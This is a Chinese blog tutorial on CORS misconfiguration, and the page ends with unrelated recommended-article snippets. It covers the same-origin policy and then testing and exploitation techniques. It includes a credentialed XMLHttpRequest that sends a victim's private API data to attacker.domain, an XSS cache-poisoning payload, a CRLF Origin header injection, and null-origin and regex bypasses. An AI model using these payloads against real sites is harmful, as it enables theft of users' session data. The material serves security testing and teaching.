CORS带来的隐患_cors漏洞危害-程序员宅基地

跨域资源共享(CORS)

跨域资源共享(cors)可以放宽浏览器的同源策略,可以通过浏览器让不同的网站和不同的服务器之间通信。

1.同源策略

同源策略在浏览器安全中是一种非常重要的概念,大量的客户端脚本支持同源策略,比如JavaScript。

同源策略允许运行在页面的脚本可以无限制的访问同一个网站(同源)中其他脚本的任何方法和属性。当不同网站页面(非同源)的脚本试图去互相访问的时候,大多数的方法和属性都是被禁止的。

这个机制对于现代web应用是非常重要的,因为他们广泛的依赖http cookie来维护用户权限,服务器端会根据cookie来判断客户端是否合法,是否能发送机密信息。

浏览器要严格隔离两个不同源的网站,目的是保证数据的完整性和机密性。

“同源”的定义:

  • 域名
  • 协议
  • tcp端口号

只要以上三个值是相同的,我们就认为这两个资源是同源的。

为了更好的解释这个概念,下面这个表将利用"http://www.example.com/dir/page.html"这个url作为示例,展示在同源策略控制下不同的结果

验证url 结果 原因
http://www.example.com/dir/page.html 成功 同域名,同协议,同主机
http://www.example.com/dir2/other.html 成功 同域名,同协议,同主机
http://www.example.com:81/dir/other.html 失败 不同端口
https://www.example.com/dir/other.html 失败 不同协议
http://en.example.com/dir/other.html 失败 不同主机
http://example.com/dir/other.html 失败 不同主机
http://v2.www.example.com/dir/other.html 失败 不同主机
2.CORS出现

CORS是一种机制,这种机制通过在http头部添加字段,通常情况下,web应用A告诉浏览器,自己有权限访问应用B。这就可以用相同的描述来定义“同源”和“跨源”操作。

CORS的标准定义是:通过设置http头部字段,让客户端有资格跨域访问资源。通过服务器的验证和授权之后,浏览器有责任支持这些http头部字段并且确保能够正确的施加限制。

主要的头部字段包含:“Access-Control-Allow-Origin”

Access-Control-Allow-Origin: https://example.com

这个头部字段所列的“源”可以以访客的方式给服务器端发送跨域请求并且可以读取返回的文本,而这种方式是被同源策略所阻止的。

默认情况下,如果没有设置“Access-Control-Allow-Credentials”这个头的话,浏览器发送的请求就不会带有用户的身份数据(cookie或者HTTP身份数据),所以就不会泄露用户隐私信息。

协议建议,可以简单的利用空格来分隔多个源,比如:

Access-Control-Allow-Origin: https://example1.com https://example2.com

然而,没有浏览器支持这样的语法

通常利用通配符去信任所有的子域名也是不行的,比如:

Access-Control-Allow-Origin: *.example1.com

当前只支持用通配符来匹配域名,比如下面:

Access-Control-Allow-Origin: *

尽管浏览器可以支持通配符,但是不能同时将凭证标志设置成true。就像下面这种头部配置:

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

这样配置浏览器将会报错,因为在响应具有凭据的请求时,服务器必须指定单个域,所不能使用通配符。简单的使用通配符将有效的禁用“Access-Control-Allow-Credentials”这个字段。

这些限制和行为的结果就是许多CORS的实现方式是根据“Origin”这个头部字段的值来生成“AccessControl-Allow-Origin”的值

还有一些关于CORS的头部字段,其中一个字段是“Vary"

根据CORS的实施标准,当”Access-Control-Allow-Origin“是被动态产生的话,就要用”Vary: Origin“去指定。

这个头部字段向客户端表明,服务器端返回内容的将根据请求中”Origin“的值发生变化。如果如果未设置此标头,则在某些情况下,它可能会被某些攻击所利用。

攻击技术

测试过程
  1. 识别
  2. 分析
  3. 利用
识别

首先,想要测试带有CORS缺陷应用的首先条件是要找到开启CORS的应用。APIs一个不错的选择,因为他们经常和不同的域交换信息。因此,通常情况下,接口会暴露一些信息收集和信息枚举的功能。

通常,当服务器收到头部带有”Origin"字段的请求的时候才会配置CORS,因此才会很容易的产生很多这样类型的漏洞。
另外,如果客户端收到返回报文的头部包含“Access-Control-*”这样的字段,但是没有定义源的话,那么很可能返回报文的头部是由请求报文中“Origin”这个字段来决定的。

因此,找到候选人接口之后,就可以发送头部带有“Origin”的数据包了。测试者应该试图让“Origin”字段使用不同的值,比如不同的域名称或者”null"。最好用一些的脚本自动化的完成这些任务。

比如:

GET /handler_to_test HTTP/1.1
Host: target.domain
Origin: https://target.domain
Connection: close

然后看服务器的返回报文头部是否带有“Access-Control-Allow-*”字段

HTTP/1.1 200 OK
…
Access-control-allow-credentials: true
Access-control-allow-origin: https://target.domain
…

上面的返回报文表明,这个应用中的接口已经开启了CORS这个功能。现在有必要对配置进行测试,以确定是否存在安全缺陷。

分析

识别出开启的CORS功能的接口之后,就要尽可能的分析配置,以发现正确的利用方式。

在这个阶段,开始fuzzing请求报文头部中“Origin”这个字段然后观察服务器的返回报文,目的是看哪些域是被允许的。重要的是验证哪种类型的控件可以被控制,应用会返回哪种头部字段。

因此,测试者应该发送发送头部字段“Origin”包含不同值的请求发送给服务器端,看看攻击者所控制的域名是否被允许。

GET /handler_to_test HTTP/1.1
Host: target.domain
Origin: https://attaker.domain
Connection: close

然后看服务器的返回报文头部是否带有“Access-Control-Allow-*”字段

HTTP/1.1 200 OK
…
Access-control-allow-credentials: true
Access-control-allow-origin: https://attacker.domain
…
利用

1.泄露用户数据

当“Access-Control-Allow-Credentials”设置为Ture时,利用这种CORS这种配置缺陷的基本技术就是创建一个JavaScript脚本去发送CORS请求,就像下面那样:

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open(“get”,”https://vulnerable.domain/api/private-data”,true);
req.withCredentials = true;
req.send();
function reqListener() {
location=”//attacker.domain/log?response=”+this.responseText;
};

用这样的代码黑客就可以通过有缺陷的“日志”接口偷到用户数据。

当带有目标系统用户凭据的受害者访问带有上述代码的页面的时候,浏览器就会发送下面的请求到“有漏洞服务器”

GET /api/private-data HTTP/1.1
Host: vulnerable.domain
Origin: https://attacker.domain/
Cookie: JSESSIONID=<redacted>

然后就会收到下面的返回数据

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: https://attacker.domain
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Access-Control-Allow-Origin,Access-Control-Allow-Credentials
Vary: Origin
Expires: Thu, 01 Jan 1970 12:00:00 GMT
Last-Modified: Wed, 02 May 2018 09:07:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json;charset=ISO-8859-1
Date: Wed, 02 May 2018 09:07:07 GMT
Connection: close
Content-Length: 149
{"id":1234567,"name":"Name","surname":"Surname","email":"[email protected]","account":"ACT1234567","balance":"123456,7","token":"to
p-secret-string"}

因为服务器发送了头部字段“Access-Control-Allow-*”给客户端,所以,受害者浏览器允许包含恶意JavaScript代码的页面访问用户的隐私数据。

2.客户端缓存中毒

这种配置允许攻击者利用其他的漏洞。比如,一个应用返回数据报文头部中包含“X-User”这个字段,这个字段的值没有经过验证就直接输出到返回页面上。

GET /login HTTP/1.1
Host: www.target.local
Origin: https://attacker.domain/
X-User: <svg/onload=alert(1)>

返回报文(注意:“Access-Control-Allow-Origin”已经被设置,但是“Access-Control-Allow-Credentials: true”并且“Vary: Origin”头没有被设置)

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker.domain/
…
Content-Type: text/html
…
Invalid user: <svg/onload=alert(1)

攻击者可以把xss的exp放在自己控制的服务器中的JavaScript代码里面然后等待受害者去触发它。

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','http://www.target.local/login',true);
req.setRequestHeader('X-User', '<svg/onload=alert(1)>');
req.send();
function reqListener() {
location='http://www.target.local/login';
}

如果在返回报文中头部没有设置“Vary: Origin”,那么可以利用上面展示的例子,可以让受害者浏览器中的缓存中存储返回数据报文(这要基于浏览器的行为)并且当浏览器访问到相关URL的时候就会直接显示出来。(通过重定向来实现,可以用“reqListener()”这个方法)

3.服务端缓存中毒
另一种潜在的攻击方式是利用CORS的错误配置注入HTTP头部,这可能会被服务器端缓存下来,比如制造存储型xss
下面是攻击的利用条件:

  • 存在服务器端缓存
  • 能够反射“Origin“头部
  • 不会检查“Origin”头部中的特殊字符,比如”\r"

有了上面的先决条件,James Kettle展示了http头部注入的利用方式,他用这种方式攻击IE/Edge用户(因为他们使用“\r"(0x0d)作为的HTTP头部字段的终结符)

请求如下:

   GET / HTTP/1.1
    Origin: z[0x0d]Content-Type: text/html; charset=UTF-7

    IE处理过后返回报文

    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: z
    Content-Type: text/html; charset=UTF-7

上面的请求不能直接拿来利用,因为攻击者没有办法保证受害者浏览器会提前发送畸形的头部。

如果攻击者能提前发送畸形的“Origin”头部,比如利用代理或者命令行的方式发送,然后服务器就会缓存这样的返回报文并且也会传递给其他人。

利用上面的例子,攻击者可以把页面的编码变成”UTF-7",周所周知,这可能会引发xss漏洞

绕过技术

null源

CORS的规范中还提到了“NULL”源。触发这个源是为了网页跳转或者是来自本地HTML文件。
目标应用可能会接收“null"源,并且这个可能被测试者(或者攻击者)利用,意外任何网站很容易使用沙盒iframe来获取”null“源

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>**CORS request here**</script>’></iframe>

使用上面的iframe产生一个请求类似于下面这样

GET /handler
Host: target.local
Origin: null

如果目标应用接收”null"源,那么服务器将返回类似下面的数据报文


HTTP/1.1 200 OK
Acess-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

这种错误配置经常会碰到,所以会很方便的去尝试它。

使用目标域名作为子域名

如果目标应用只检查只检查“Origin”中的字符串是否包含“target.local”,那么就可以在自己控制的服务器上创建一个子域名。
用这样的方式,请求一般产生自JavaScript代码,并且请求中的“Origin”会像下面这样

Origin: https://target.local.attacker.domain

注册一个同名的域名

假设,目标应用实现是基于下面的正则表达式去检测“Origin”头部的话:

^https?:\/\/.*\.?target\.local$

这样的正则表达式包含一个问题,导则这样的CORS配置都容易被攻击。下面表格将分解正则表达式:

Part 描述
.* 除了终止符的任何字符
. 一个点
? 在这里匹配一个“.”一次或者零次

这个?只影响".“这个字符串,因此在“target.local”前面的任何字符串都是被允许的,而不管是否有”."把他们分开。
因此,只需要在“origin”末尾包含目标域名就可以绕过上面的限制(这个场景的的目标域名是“
target.local”),比如:

Origin: https://nottarget.local

攻击者只需要注册一个末尾包含目标域名的新域名就可以利用这样的漏洞了。

控制目标的子域名

现在目标应用实现是基于下面的正则表达式去检测“Origin”头部的话:

^https?:\/\/(.*\.)?target\.local$

这个允许来自”target.local“的跨域访问并且包含所有的子域名(来自HTTP和HTTPS协议)。
在这个场景中,如果攻击者能控制目标的有效的子域名(比如:“subdomain.target.local”),比如接管一个子域名,或者找到一个有xss漏洞的子域名。攻击者就可以产生一个有效的CORS请求。

使用特殊的特性

Corban Leo展示了一个比较有趣的研究,他在域名中插入一些特殊的字符来绕过一些限制。

这个研究员的特殊字符法只能用在Safari浏览器上。但是,我们进行了深入的分析,显示其中一部分特殊字符串也可以用在其他的浏览器中。
这种规避技术所面临的问题是,在发送请求之前,浏览器不总是会去验证域名的有效性。因此,如果使用一些特殊的字符串,那么浏览器可能就不会提前发送请求去验证域名是否存在或者有效。

假设,目标应用实现是基于下面的正则表达式去检测“Origin”头部的话:

^https?:\/\/(.*\.)?target.local([^\.\-a-zA-Z0-9]+.*)?

上面的正则表达式的意思是,允许所有“target.local”的子域名的跨域请求,并且这些请求可以来自于子域名的任意端口。
下面是正则表达式的分解:
Part 描述
[^.-a-zA-Z0-9] 所有的字符串包含".","-",“a-z”,“A-Z”,“0-9”

  • 匹配前面的子表达式一次或多次
    .* 除了终止符的任何字符
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37865996/article/details/102417173

智能推荐

门控开关项目--稳压二极管和三极管,精简成本-程序员宅基地

文章浏览阅读454次。稳压二极管从负端到正端流过一个大于2mA的电流,稳压二极管两端的电压就会稳定。稳压二极管也可以当做一个普通的二极管使用(从正端流向负端)。常见稳压二极管 3V 4.3V 5.1V 5.6V 8.3V 13V 18V 27V 30V上图是稳压管不带负载的情况(没有实际意义的电路)。注意:自己使用二极管制作全桥整流桥时,二极管的反向耐压至少2.8倍的..._3.3v稳压二极管电路图csn

一文看懂win10 tensorflow-gpu 1.11.0 安装及配置,以及各种报错_tensorflow1.11.0-程序员宅基地

文章浏览阅读1k次。装tensorflow cpu版本还是很简单的,装gpu版本则要一步步来,而且要仔细看报错。电脑配置:win10 64位 python3.6.7 64位 Anaconda 2019.03版 华硕gtx1060 6g主要步骤:根据显卡安装cuda 根据cuda安装cudnn 安装tensorflow-gpu主要下载的网站:cuda:https://develope..._tensorflow1.11.0

Python语言程序设计Y.Daniel Liang练习题Chapter12_上海交通大学出版社python语言程序设计教程第12页习题-程序员宅基地

文章浏览阅读420次。ckp12.1'''先把父类导入进来,再在自己定义的类里包含进这个类名super()可以继承父类的变量和方法super().__init__()'''ckp12.2class A: def __init__(self, i = 0): self.i = iclass B(A): def __init__(self, j = 1): super().__init__() self.j = jdef main()_上海交通大学出版社python语言程序设计教程第12页习题

目标追踪(tracking)的基础用法_目标追踪的步骤-程序员宅基地

文章浏览阅读317次,点赞9次,收藏6次。目标追踪(Tracking)是计算机视觉领域的一个重要任务,旨在从视频序列中连续跟踪一个或多个目标对象。它广泛应用于安全监控、运动分析、交互设计、自动驾驶等领域。_目标追踪的步骤

斐讯K2刷不死breed与第三方固件教程-程序员宅基地

文章浏览阅读2.8k次。  本文主要就是简单的斐讯 K2 刷机教程,方便大家了解一下K2 怎样刷固件。斐讯 K2 是一款 1200M AC 双频无线路由器,支持 5G 和 2.4G WiFi 信号,虽然缺少 USB 且只有百兆网口,但强劲的无线传输速度还是值得一撸的!用来无线看高清电影、做 AP 扩展什么的也非常实用。  其实,斐讯 K2 的官方固件用于日常使用完全够用的,界面也很清爽,但很多人更多的是担..._k2刷机专用固件

检测9000类物体的YOLO9000-程序员宅基地

文章浏览阅读8.5k次,点赞4次,收藏10次。本想总结一下,看完发现整篇文章多余的话有点少。YOLO的实时性众所周知,所以还等什么,皮皮虾我们走~_yolo9000

随便推点

12、栈、队列和字符串的基本操作(Java数据结构)_使用栈与队列逐个处理字符串中的每个字符 将line中的字符依次入栈,然后输出栈中元-程序员宅基地

文章浏览阅读1.2k次。7-2 栈、队列和字符串的基本操作 (22分)使用栈与队列逐个处理字符串中的每个字符 将输入的字符串的字符依次入栈,然后输出栈中元素个数与栈顶元素,以空格分隔。 然后将栈中元素依次出栈并输出,出栈时将不等于指定字符的元素依次入队列。 输出队列元素个数,队头元素元素,以空格分隔。 最后输出队列中所有元素。 要求使用Java提供的Stack类、Queue接口和LinkedList类或ArrayList类。输入格式:输入一个个字符串和输入一个字符。输出格式:第一行输出栈中元素个数,栈顶元素(以空格分隔)_使用栈与队列逐个处理字符串中的每个字符 将line中的字符依次入栈,然后输出栈中元

vue-cli 2.x版本中conf/index中assetsRoot、assetsSubDirectory、assetsPublicPath路径的含义-程序员宅基地

文章浏览阅读4.5k次,点赞4次,收藏5次。vue-cli 2.x版本中conf/index中assetsRoot、assetsSubDirectory、assetsPublicPath路径的含义 assetsRoot: path.resolve(__dirname, '../dist'), assetsSubDirectory: 'static', assetsPublicPath: '/',assetsRoot 资源根路径 项目打包后存放的路径 即项目目录下的dist文件assetsSubDirectory _assetsroot

django 实现验证码功能_django 验证码有效时间-程序员宅基地

文章浏览阅读4.9k次。这是我做的验证码的效果图 .验证码---- 提高安全性的 1.特点: 1.时效性 2.随机性 3.安全 4.模糊 2.使用: 1.安装pillow模块来处理 pip install pillow 2.材料: 画布, 画笔,... 3.代码画验证码: # 创建一个画布..._django 验证码有效时间

量化研究 | 策略在指数与主连复权的差异化分析(最终篇)_指数是否复权-程序员宅基地

本篇文章是量化策略研究者吕洋洋的最终篇,主要分析了指数与主连复权之间的差异化情况。作者计划在后续研究中探讨CTA的风险平价组合,以此为基础研究投资界的“免费午餐”。需要注意的是,本策略仅用于学习交流,实盘交易的盈亏由个人投资者负责。

sublime 自动触发补全_sublime 不要空格 触发补全-程序员宅基地

文章浏览阅读5.6k次。Preferences- settings user -Preferences.sublime-settings中设置自动触发:{"auto_complete": true,"auto_mathch_enabled": true,"color_scheme": "Packages/User/SublimeLinter/Monokai (SL).tmTheme","f_sublime 不要空格 触发补全

微信小程序列表的上拉加载和下拉刷新的实现-程序员宅基地

文章浏览阅读5.1k次。微信小程序可谓是9月21号之后最火的一个名词了,一经出现真是轰炸了整个开发人员,当然很多App开发人员有了一个担心,微信小程序的到来会不会让移动端App颠覆,让移动端的程序员失业,身为一个Android开发者我是不相信的,即使有,那也是需要个一两年的过度和打磨才能实现的吧。不管微信小程序是否能颠覆当今的移动开发格局,我们都要积极向上的心态去接收,去学习。不排斥新技术,所以,心动不如行动,赶紧先...